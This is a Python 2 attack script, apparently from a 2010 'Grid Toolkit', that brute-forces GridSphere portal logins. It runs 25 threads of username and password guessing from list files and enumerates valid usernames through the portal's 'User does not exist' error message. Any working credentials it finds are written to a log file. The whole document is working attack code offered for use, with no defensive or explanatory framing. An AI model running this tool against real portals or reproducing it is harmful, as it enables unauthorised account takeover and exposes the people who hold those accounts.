#!/usr/bin/python
# Gridsphere - gridportlet utility to remotely guess valid user/pass login
# This release is part of Grid Toolkit
# Copyright IPSECS (c) 2010 http://ipsecs.com

import sys,re,os,threading
from urllib2 import urlopen

#You need to install ClientForm from this site
#http://wwwsearch.sourceforge.net/old/ClientForm
try:
 from ClientForm import ParseResponse
except:
 print "ClientForm module for python is missing"
 print "Exiting.."
 quit()

class brute(threading.Thread):
 tlist = []
 log = "logs/portal.log"
 maxthreads = 25
 evnt = threading.Event()
 lck = threading.Lock()

 def __init__(self,url,user,password):
  threading.Thread.__init__(self)
  self.url = url
  self.user = user
  self.password = password

 def run(self):
  logfile = open(brute.log,"a")
  response = urlopen(self.url)
  forms = ParseResponse(response, backwards_compat=False)
  for rawform in forms:
   igot = re.search("<TextControl\(username=\)>",str(rawform))
   if igot:
    form = rawform
    original_text = form["username"]
    form["username"] = self.user
    original_text = form["password"]
    form["password"] = self.password
    result = urlopen(form.click()).read()
    #Remote user enumeration
    if self.password == "_gridkit_":
     u_got = re.search("User does not exist",result)
     if u_got:
      print "[INVALID] " + self.user
     else:
      print "[OK] " + self.user
      record = "[OK] " + self.user + " on " + self.url + "\n"
      logfile.write(record)
    #Remote user/password guessing
    else:
     u_got = re.search("User does not exist",result)
     p_got = re.search("Incorrect password provided",result)
     if u_got or p_got:
      print "[INVALID] u: " + self.user + "/p: " + self.password
     else:
      print "[OK] u: " + self.user + "/p: " + self.password
      record = "[OK] u: " + self.user + "/p: " + self.password + " on " + self.url + "\n"
      logfile.write(record)

  logfile.close()
  brute.lck.acquire()
  brute.tlist.remove(self)
  if len(brute.tlist) == brute.maxthreads-1:
   brute.evnt.set()
   brute.evnt.clear()
  brute.lck.release()

 def newthread(lnk,usr,pwd):
  brute.lck.acquire()
  br = brute(lnk,usr,pwd)
  brute.tlist.append(br)
  brute.lck.release()
  br.start()
 newthread = staticmethod(newthread)

def isFile(args):
 if os.path.isfile(args) == False:
  print "File " + args + " is not found!"
  quit()

def main():
 if len(sys.argv) < 3:
  print """
  You have to provide both user and password file to guess valid login
  Providing user without password just enumerates validity of user
  
  Usage   : run [URL Login] [User List File] | [Password File]
  Example : run https://example.com/portal?cid=login users.txt
  """
  sys.exit(0);

 isFile(sys.argv[2])
 input = open(sys.argv[2],"r")
 users = []
 for user in input:
  users.append(user.rstrip())
 if len(sys.argv) > 3:
  isFile(sys.argv[3])
  pwlist = open(sys.argv[3],"r")
  passwords = []
  for password in pwlist:
   passwords.append(password.rstrip())

 if len(sys.argv) > 3: #length more than 3
  for acct in users:
   for pwd in passwords:
    brute.lck.acquire()
    if len(brute.tlist) >= brute.maxthreads:
     brute.lck.release()
     brute.evnt.wait()
    else:
     brute.lck.release()
     brute.newthread(sys.argv[1],acct,pwd)
 else: #length less or equal than 3
  for acct in users:
   brute.lck.acquire()
   if len(brute.tlist) >= brute.maxthreads:
    brute.lck.release()
    brute.evnt.wait()
   else:
    brute.lck.release()
    brute.newthread(sys.argv[1],acct,"_gridkit_")

 for br in brute.tlist:
  br.join()

if __name__ == '__main__':
 main()
